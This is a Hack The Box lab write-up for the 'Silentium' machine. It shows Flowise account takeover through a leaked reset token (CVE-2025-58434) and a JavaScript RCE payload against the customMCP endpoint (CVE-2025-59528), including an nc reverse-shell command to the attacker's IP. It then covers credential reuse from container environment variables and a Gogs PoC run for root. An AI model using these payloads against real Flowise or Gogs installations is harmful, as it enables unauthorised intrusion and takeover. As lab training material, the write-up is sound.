Hack The Box / LINUX / 2026-09-12
Hack The Box — Silentium (Linux)
We begin with a subdomain running Flowise where a password reset vulnerability leaks a temporary token for the user Ben. We use this token to reset the password, log in, and exploit a custom MCP node-load method vulnerability to achieve remote code execution inside a Docker container. After finding plaintext credentials in the container's environment variables, we log in via SSH to the host system. Finally, we forward a local port running Gogs and exploit a command execution vulnerability in the Git service to gain root access.
Target
IP: 10.129.26.1
Port scan
sudo nmap -sC -sV 10.129.26.1 -p- -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://silentium.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Add silentium.htb to /etc/hosts:
Virtual host discovery
Let's enumerate the virtual hosts:
gobuster vhost -u 'http://silentium.htb' -w /home/kali/wordlists/subdomains-top1million-110000.txt -t 50 --append-domain
staging.silentium.htb Status: 200 [Size: 3142]
Add staging.silentium.htb to /etc/hosts:
Flowise – CVE-2025-58434 & CVE-2025-59528
With a browser go to http://staging.silentium.htb.
It's Flowise (https://flowiseai.com/). There is a login form.
At the main website http://silentium.htb there is a list of users who belongs to the company. Among them there is the user Ben.
Now, back to http://staging.silentium.htb. If we try tp login with a random email, we get the error:
User Not Found
Conversely, if we try to login with the email ben@silentium.htb, we get a different error:
Incorrect Email or Password
So probably ben@silentium.htb is a valid email.
Searching on internet for Flowise vulnerabilities, we find some CVEs. Firstly, there is CVE-2025-58434 (https://nvd.nist.gov/vuln/detail/CVE-2025-58434). According to the description, the endpoint for password reset returns sensitive information when a valid email is provided. Let's try it. Click on Forgot password? so we arrive to the password reset page.
Now open developer tools (F12) and go to the Network tab. Fill the email field with ben@silentium.htb and click on the button. On the website page we get this output:
Password reset instructions sent to the email.
On the network tab we can see that a request to the api enpoint http://staging.silentium.htb/api/v1/account/forgot-password has been made, and we can see the full response:
{
"user": {
"id": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
"name": "admin",
"email": "ben@silentium.htb",
"credential": "$2a$05$6o1ngPjXiRj.EbTK33PhyuzNBn2CLo8.b0lyys3Uht9Bfuos2pWhG",
"tempToken": "X5mIK2Aq0yaXcS9l0c5preMkVXrn2ouURktWcGlxop4pzhb9FO1DfmscFOM43WUH",
"tokenExpiry": "2026-04-11T21:02:51.811Z",
"status": "active",
"createdDate": "2026-01-29T20:14:57.000Z",
"updatedDate": "2026-04-11T20:47:51.000Z",
"createdBy": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
"updatedBy": "e26c9d6c-678c-4c10-9e36-01813e8fea73"
},
"organization": {},
"organizationUser": {},
"workspace": {},
"workspaceUser": {},
"role": {}
}
We see the tempToken field.
Now, on the password reset page, click on the link Change your password here. We arrive to a page with a form. We can input the email, the tempToken as the reset token and the new password. I choose the password 'Summer2026!'. Then click on the button. The website says:
Password reset successful
Now login with the credentials:
Email: ben@silentium.htb
Password: Summer2026!
Login is successful. We get to the dashboard.
Searching on internet we also find CVE-2025-59528 (https://nvd.nist.gov/vuln/detail/CVE-2025-59528). The vulnerability permits remote code execution by sending a specially crafted JSON payload to the API endpoint /api/v1/node-load-method/customMCP.
At the page https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p there is a proof of concept for the vulnerability. We can modify it to adapt to our case.
We need a valid API Key. On the dashboard of Flowise, on the left menu, click on API Keys. There is a DefaultKey, so copy the value.
Now let's test the RCE. Run the following command:
curl -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "Authorization: Bearer hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc" \
-d '{
"loadMethod": "listActions",
"inputs": {
"mcpServerConfig": "({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"sleep 5\");return 1;})()})"
}
}'
Here I have put the copied API key. If you run this command, the response will be delayed by 5 seconds. This means that the RCE works.
Now let's try to get a reverse shell. Start a listener:
nc -vlnp 4444
Now trigger the RCE:
curl -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "Authorization: Bearer hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc" \
-d '{
"loadMethod": "listActions",
"inputs": {
"mcpServerConfig": "({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.41 4444 >/tmp/f\");return 1;})()})"
}
}'
We get a reverse shell
ls -la /
We notice the file .dockerenv, so we are in a docker container.
Container enumeration and credential reuse
Let's check the environment variables:
env
In the output we notice:
FLOWISE_PASSWORD=F1l3_d0ck3r
SMTP_PASSWORD=r04D!!_R4ge
Now connect with ssh to the target machine:
ssh ben@silentium.htb
# insert password r04D!!_R4ge
We get a shell.
Gogs - CVE-2025-8110
Let's check the listening ports:
ss -ltpn
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.1:1025 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:40525 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:8025 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:22 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:3001 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:3000 0.0.0.0:*
LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
LISTEN 0 4096 [::]:22 [::]:*
LISTEN 0 511 [::]:80 [::]:*
Let's forward the port 3001 to our machine:
ssh ben@silentium.htb -NL 3001:localhost:3001
With a browser, go to http://127.0.0.1:3001/. It's Gogs, a self-hosted Git service.
Searching on internet for Gogs vulnerabilities, we find CVE-2025-8110 (https://nvd.nist.gov/vuln/detail/CVE-2025-8110). The vulnerability allows arbitrary command execution.
There is a publicly available proof of concept on GitHub: https://github.com/zAbuQasem/gogs-CVE-2025-8110. We can use it to exploit the vulnerability.
In my case, it didn't work out of the box, so I had to do some steps. Firstly, on the website of Gogs, create a new user with the following data:
Username: test12
Email: test12@test.com
Password: test12
Then, I modified the poc script CVE-2025-8110.py to skip the registration of a new user and use this user. Also, when the script executes a git commit, I had to add some python code before to set the git user name and email, otherwise the commit fails. See the attached file CVE-2025-8110.py for the final version of the script that works.
Start a listener:
nc -vlnp 4444
Run the script:
python3 CVE-2025-8110.py -u http://127.0.0.1:3001/ -lh 10.10.16.41 -lp 4444
We get a reverse shell as the root user.